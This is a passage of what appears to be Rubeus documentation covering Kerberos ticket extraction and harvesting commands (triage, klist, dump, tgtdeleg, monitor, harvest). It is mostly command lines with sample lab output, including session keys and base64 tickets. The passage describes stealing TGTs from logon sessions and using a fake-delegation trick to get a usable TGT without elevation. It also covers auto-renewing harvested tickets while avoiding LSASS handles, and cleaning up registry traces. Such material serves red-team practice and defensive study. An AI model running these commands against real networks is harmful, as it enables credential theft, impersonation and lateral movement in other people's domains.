Ticket Extraction and Harvesting
Breakdown of the ticket extraction/harvesting commands:
Command
Description
triage
LUID, username, service target, ticket expiration
klist
Detailed logon session and ticket info
dump
Detailed logon session and ticket data
tgtdeleg
Retrieve usable TGT for non-elevated user
monitor
Monitor logon events and dump new tickets
harvest
Same as monitor but with auto-renewal functionality
triage
The triage action will output a table of the current user's Kerberos tickets, if not elevated. If run from an elevated context, a table describing all Kerberos tickets on the system is displayed. Ticket can be filtered for a specific service with /service:SNAME
.
If elevated, tickets can be filtered for a specific LogonID with /luid:0xA..
or a specific user with /user:USER
. This can be useful when triaging systems with a lot of Kerberos tickets.
Triage all enumerateable tickets (non-elevated):
C:\Rubeus>Rubeus.exe triage
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.4
[*] Action: Triage Kerberos Tickets (Current User)
[*] Current LUID : 0x4420e
-----------------------------------------------------------------------------------------
| LUID | UserName | Service | EndTime |
-----------------------------------------------------------------------------------------
| 0x4420e | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 4:04:14 PM |
| 0x4420e | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 4:04:14 PM |
| 0x4420e | harmj0y @ TESTLAB.LOCAL | cifs/primary.testlab.local | 2/12/2019 4:04:14 PM |
-----------------------------------------------------------------------------------------
Triage all enumerateable tickets (elevated):
C:\Rubeus>Rubeus.exe triage
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.4
[*] Action: Triage Kerberos Tickets (All Users)
-------------------------------------------------------------------------------------------------------------
| LUID | UserName | Service | EndTime |
-------------------------------------------------------------------------------------------------------------
| 0x56cdda9 | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 4:04:14 PM |
| 0x56cdda9 | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 4:04:14 PM |
| 0x56cdda9 | harmj0y @ TESTLAB.LOCAL | cifs/primary.testlab.local | 2/12/2019 4:04:14 PM |
| 0x56cdd86 | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 4:04:02 PM |
| 0x47869cc | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 3:19:11 PM |
| 0x47869cc | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 3:19:11 PM |
| 0x47869cc | harmj0y @ TESTLAB.LOCAL | cifs/primary.testlab.local | 2/12/2019 3:19:11 PM |
| 0x47869b4 | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 3:05:29 PM |
| 0x3c4c241 | dfm.a @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/11/2019 4:24:02 AM |
| 0x441d8 | dfm.a @ TESTLAB.LOCAL | cifs/primary.testlab.local | 2/10/2019 11:41:26 PM |
| 0x441d8 | dfm.a @ TESTLAB.LOCAL | LDAP/primary.testlab.local | 2/10/2019 11:41:26 PM |
| 0x3e4 | windows10$ @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 1:25:01 PM |
| 0x3e4 | windows10$ @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 1:25:01 PM |
| 0x3e4 | windows10$ @ TESTLAB.LOCAL | cifs/PRIMARY.testlab.local | 2/12/2019 1:25:01 PM |
| 0x3e4 | windows10$ @ TESTLAB.LOCAL | ldap/primary.testlab.local/testlab.local | 2/11/2019 7:23:48 PM |
| 0x3e7 | windows10$ @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 2:23:45 PM |
| 0x3e7 | windows10$ @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 2:23:45 PM |
| 0x3e7 | windows10$ @ TESTLAB.LOCAL | cifs/PRIMARY.testlab.local/testlab.local | 2/12/2019 2:23:45 PM |
| 0x3e7 | windows10$ @ TESTLAB.LOCAL | WINDOWS10$ | 2/12/2019 2:23:45 PM |
| 0x3e7 | windows10$ @ TESTLAB.LOCAL | LDAP/PRIMARY.testlab.local/testlab.local | 2/12/2019 2:23:45 PM |
-------------------------------------------------------------------------------------------------------------
Triage targeting a specific service (elevated):
C:\Rubeus>Rubeus.exe triage /service:ldap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.4
[*] Action: Triage Kerberos Tickets (All Users)
[*] Target service : ldap
-----------------------------------------------------------------------------------------------------------
| LUID | UserName | Service | EndTime |
-----------------------------------------------------------------------------------------------------------
| 0x441d8 | dfm.a @ TESTLAB.LOCAL | LDAP/primary.testlab.local | 2/10/2019 11:41:26 PM |
| 0x3e4 | windows10$ @ TESTLAB.LOCAL | ldap/primary.testlab.local/testlab.local | 2/11/2019 7:23:48 PM |
| 0x3e7 | windows10$ @ TESTLAB.LOCAL | LDAP/PRIMARY.testlab.local/testlab.local | 2/12/2019 2:23:45 PM |
-----------------------------------------------------------------------------------------------------------
klist
The klist will list detailed information on the current user's logon session and Kerberos tickets, if not elevated. If run from an elevated context, information on all logon sessions and associated Kerberos tickets is displayed. Logon and ticket information can be displayed for a specific LogonID with /luid:0xA..
(if elevated).
Listing the current (non-elevated) user's logon session and Kerberos ticket information:
C:\Rubeus>Rubeus.exe klist
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.4
[*] Action: List Kerberos Tickets (Current User)
[*] Current LUID : 0x4420e
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 2/12/2019 11:04:14 AM ; 2/12/2019 4:04:14 PM ; 2/19/2019 11:04:14 AM
Server Name : krbtgt/TESTLAB.LOCAL @ TESTLAB.LOCAL
Client Name : harmj0y @ TESTLAB.LOCAL
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable (60a10000)
...(snip)...
Elevated listing of another user's logon session/Kerberos ticket information:
C:\Rubeus>Rubeus.exe klist /luid:0x47869b4
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: List Kerberos Tickets (All Users)
[*] Target LUID : 0x47869b4
UserName : harmj0y
Domain : TESTLAB
LogonId : 0x47869b4
UserSID : S-1-5-21-883232822-274137685-4173207997-1111
AuthenticationPackage : Kerberos
LogonType : Interactive
LogonTime : 2/11/2019 11:05:31 PM
LogonServer : PRIMARY
LogonServerDNSDomain : TESTLAB.LOCAL
UserPrincipalName : [email protected]
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 2/11/2019 3:05:31 PM ; 2/11/2019 8:05:31 PM ; 2/18/2019 3:05:31 PM
Server Name : krbtgt/TESTLAB.LOCAL @ TESTLAB.LOCAL
Client Name : harmj0y @ TESTLAB.LOCAL
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)
...(snip)...
dump
The dump action will extract current TGTs and service tickets if in an elevated context. If not elevated, service tickets for the current user are extracted. The resulting extracted tickets can be filtered by /service
(use /service:krbtgt
for TGTs) and/or logon ID (the /luid:0xA..
parameter). The KRB-CRED files (.kirbis) are output as base64 blobs and can be reused with the ptt function, or Mimikatz's kerberos::ptt functionality.
Note: if run from a non-elevated context, the session keys for TGTs are not returned (by default) from the associated APIs, so only service tickets extracted will be usable. If you want to (somewhat) workaround this, use the tgtdeleg command.
Extracting the current user's usable service tickets:
C:\Rubeus>Rubeus.exe dump
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.4
[*] Action: Dump Kerberos Ticket Data (Current User)
[*] Current LUID : 0x4420e
[*] Returned 3 tickets
ServiceName : krbtgt/TESTLAB.LOCAL
TargetName : krbtgt/TESTLAB.LOCAL
ClientName : harmj0y
DomainName : TESTLAB.LOCAL
TargetDomainName : TESTLAB.LOCAL
AltTargetDomainName : TESTLAB.LOCAL
SessionKeyType : rc4_hmac
Base64SessionKey : AAAAAAAAAAAAAAAAAAAAAA==
KeyExpirationTime : 12/31/1600 4:00:00 PM
TicketFlags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
StartTime : 2/11/2019 3:19:15 PM
EndTime : 2/11/2019 8:19:13 PM
RenewUntil : 2/18/2019 3:19:13 PM
TimeSkew : 0
EncodedTicketSize : 1306
Base64EncodedTicket :
doIFFjCCBRKgAwIBBaEDAgEWoo...(snip)...
...(snip)...
[*] Enumerated 3 total tickets
[*] Extracted 3 total tickets
Elevated extraction of tickets from a specific logon session:
C:\Rubeus>Rubeus.exe dump /luid:0x47869cc
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: Dump Kerberos Ticket Data (All Users)
[*] Target LUID: 0x47869cc
UserName : harmj0y
Domain : TESTLAB
LogonId : 0x47869cc
UserSID : S-1-5-21-883232822-274137685-4173207997-1111
AuthenticationPackage : Negotiate
LogonType : Interactive
LogonTime : 2/11/2019 11:05:31 PM
LogonServer : PRIMARY
LogonServerDNSDomain : TESTLAB.LOCAL
UserPrincipalName : [email protected]
[*] Enumerated 3 ticket(s):
ServiceName : krbtgt/TESTLAB.LOCAL
TargetName : krbtgt/TESTLAB.LOCAL
ClientName : harmj0y
DomainName : TESTLAB.LOCAL
TargetDomainName : TESTLAB.LOCAL
AltTargetDomainName : TESTLAB.LOCAL
SessionKeyType : rc4_hmac
Base64SessionKey : u9DOCzuGKAZB6h/E/9XcFg==
KeyExpirationTime : 12/31/1600 4:00:00 PM
TicketFlags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
StartTime : 2/11/2019 3:21:53 PM
EndTime : 2/11/2019 8:19:13 PM
RenewUntil : 2/18/2019 3:19:13 PM
TimeSkew : 0
EncodedTicketSize : 1306
Base64EncodedTicket :
doIFFjCCBRKgAwIBBaEDAgEWoo...(snip)...
ServiceName : krbtgt/TESTLAB.LOCAL
TargetName : krbtgt/TESTLAB.LOCAL
ClientName : harmj0y
DomainName : TESTLAB.LOCAL
TargetDomainName : TESTLAB.LOCAL
AltTargetDomainName : TESTLAB.LOCAL
SessionKeyType : aes256_cts_hmac_sha1
Base64SessionKey : tKcszT8rdYyxBxBHlkpmJ/SEsfON8mBMs4ZN/29Xv8A=
KeyExpirationTime : 12/31/1600 4:00:00 PM
TicketFlags : name_canonicalize, pre_authent, initial, renewable, forwardable
StartTime : 2/11/2019 3:19:13 PM
EndTime : 2/11/2019 8:19:13 PM
RenewUntil : 2/18/2019 3:19:13 PM
TimeSkew : 0
EncodedTicketSize : 1338
Base64EncodedTicket :
doIFNjCCBTKgAwIBBaEDAgEWoo...(snip)...
...(snip)...
[*] Enumerated 3 total tickets
[*] Extracted 3 total tickets
Elevated extraction of all TGTs on a system:
C:\Rubeus>Rubeus.exe dump /service:krbtgt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: Dump Kerberos Ticket Data (All Users)
[*] Target service : krbtgt
UserName : harmj0y
Domain : TESTLAB
LogonId : 0x47869cc
UserSID : S-1-5-21-883232822-274137685-4173207997-1111
AuthenticationPackage : Negotiate
LogonType : Interactive
LogonTime : 2/11/2019 11:05:31 PM
LogonServer : PRIMARY
LogonServerDNSDomain : TESTLAB.LOCAL
UserPrincipalName : [email protected]
[*] Enumerated 3 ticket(s):
ServiceName : krbtgt/TESTLAB.LOCAL
TargetName : krbtgt/TESTLAB.LOCAL
ClientName : harmj0y
DomainName : TESTLAB.LOCAL
TargetDomainName : TESTLAB.LOCAL
AltTargetDomainName : TESTLAB.LOCAL
SessionKeyType : rc4_hmac
Base64SessionKey : y4LL+W3KZoOjnwsiwf150g==
KeyExpirationTime : 12/31/1600 4:00:00 PM
TicketFlags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
StartTime : 2/11/2019 3:23:50 PM
EndTime : 2/11/2019 8:19:13 PM
RenewUntil : 2/18/2019 3:19:13 PM
TimeSkew : 0
EncodedTicketSize : 1306
Base64EncodedTicket :
doIFFjCCBRKgAwIBBaEDAgEWoo...(snip)...
...(snip)...
UserName : WINDOWS10$
Domain : TESTLAB
LogonId : 0x3e4
UserSID : S-1-5-20
AuthenticationPackage : Negotiate
LogonType : Service
LogonTime : 2/7/2019 4:51:20 PM
LogonServer :
LogonServerDNSDomain : testlab.local
UserPrincipalName : [email protected]
[*] Enumerated 4 ticket(s):
ServiceName : krbtgt/TESTLAB.LOCAL
TargetName : krbtgt/TESTLAB.LOCAL
ClientName : WINDOWS10$
DomainName : TESTLAB.LOCAL
TargetDomainName : TESTLAB.LOCAL
AltTargetDomainName : TESTLAB.LOCAL
SessionKeyType : rc4_hmac
Base64SessionKey : 0NgsSyZ/XOCTi9wLR1z9Kg==
KeyExpirationTime : 12/31/1600 4:00:00 PM
TicketFlags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
StartTime : 2/11/2019 3:23:50 PM
EndTime : 2/11/2019 7:23:48 PM
RenewUntil : 2/18/2019 2:23:48 PM
TimeSkew : 0
EncodedTicketSize : 1304
Base64EncodedTicket :
doIFFDCCBRCgAwIBBaEDAgEWoo...(snip)...
...(snip)...
[*] Enumerated 20 total tickets
[*] Extracted 9 total tickets
tgtdeleg
The tgtdeleg using @gentilkiwi's Kekeo trick (tgt::deleg) that abuses the Kerberos GSS-API to retrieve a usable TGT for the current user without needing elevation on the host. AcquireCredentialsHandle() is used to get a handle to the current user's Kerberos security credentials, and InitializeSecurityContext() with the ISC_REQ_DELEGATE flag and a target SPN of HOST/DC.domain.com to prepare a fake delegate context to send to the DC. This results in an AP-REQ in the GSS-API output that contains a KRB_CRED in the authenticator checksum. The service ticket session key is extracted from the local Kerberos cache and is used to decrypt the KRB_CRED in the authenticator, resulting in a usable TGT .kirbi.
If automatic target/domain extraction is failing, a known SPN of a service configured with unconstrained delegation can be specified with /target:SPN
.
C:\Rubeus>Rubeus.exe tgtdeleg
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: Request Fake Delegation TGT (current user)
[*] No target SPN specified, attempting to build 'HOST/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'HOST/PRIMARY.testlab.local'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: YnEFxPfqw3LdfNvLtdFfzaFf7zG3hG+HNjesy+6R+ys=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):
doIFNjCCBTKgAwIBBaEDAgEWoo...(snip)...
monitor
The monitor action will periodically extract all TGTs every /monitorinterval:X
seconds (default of 60) and display any newly captured TGTs. A /targetuser:USER
can be specified, returning only ticket data for said user. This function is especially useful on servers with unconstrained delegation enabled ;)
When the /targetuser:USER
(or if not specified, any user) creates a new 4624 logon event, any extracted TGT KRB-CRED data is output.
The /nowrap
flag causes the base64 encoded ticket output to no wrap per line.
If you want monitor to run for a specific period of time, use /runfor:SECONDS
.
Further, if you wish to save the output to the registry, pass the /registry
flag and specfiy a path under HKLM to create (e.g., /registry:SOFTWARE\MONITOR
). Then you can remove this entry after you've finished running Rubeus by Get-Item HKLM:\SOFTWARE\MONITOR\ | Remove-Item -Recurse -Force
.
c:\Rubeus>Rubeus.exe monitor /targetuser:DC$ /interval:10
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.5.0
[*] Action: TGT Monitoring
[*] Target user : DC$
[*] Monitoring every 10 seconds for new TGTs
[*] 12/21/2019 11:10:16 PM UTC - Found new TGT:
User : [email protected]
StartTime : 12/21/2019 2:44:31 PM
EndTime : 12/21/2019 3:44:31 PM
RenewTill : 12/28/2019 2:13:06 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
doIFFDCCBRCgAwIBBaEDAgEWoo...(snip)...
[*] Ticket cache size: 1
Note that this action needs to be run from an elevated context!
harvest
The harvest action takes monitor one step further. It periodically extract all TGTs every /monitorinterval:X
seconds (default of 60), extracts any new TGT KRB-CRED files, and keeps a cache of any extracted TGTs. Every interval, any TGTs that will expire before the next interval are automatically renewed (up until their renewal limit). Every /displayinterval:X
seconds (default of 1200) and the current cache of "usable"/valid TGT KRB-CRED .kirbis are output as base64 blobs.
This allows you to harvest usable TGTs from a system without opening up a read handle to LSASS, though elevated rights are needed to extract the tickets.
The /nowrap
flag causes the base64 encoded ticket output to no wrap per line.
If you want harvest to run for a specific period of time, use /runfor:SECONDS
.
Further, if you wish to save the output to the registry, pass the /registry
flag and specfiy a path under HKLM to create (e.g., /registry:SOFTWARE\MONITOR
). Then you can remove this entry after you've finished running Rubeus by Get-Item HKLM:\SOFTWARE\MONITOR\ | Remove-Item -Recurse -Force
.
c:\Rubeus>Rubeus.exe harvest /interval:30
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v0.0.1a
[*] Action: TGT Harvesting (w/ auto-renewal)
[*] Monitoring every 30 minutes for 4624 logon events
...(snip)...
[*] Renewing TGT for [email protected]
[*] Connecting to 192.168.52.100:88
[*] Sent 1520 bytes
[*] Received 1549 bytes
[*] 9/17/2018 6:43:02 AM - Current usable TGTs:
User : [email protected]
StartTime : 9/17/2018 6:43:02 AM
EndTime : 9/17/2018 11:43:02 AM
RenewTill : 9/24/2018 2:07:48 AM
Flags : name_canonicalize, renewable, forwarded, forwardable
Base64EncodedTicket :
doIFujCCBbagAw...(snip)...
Note that this action needs to be run from an elevated context!
Last updated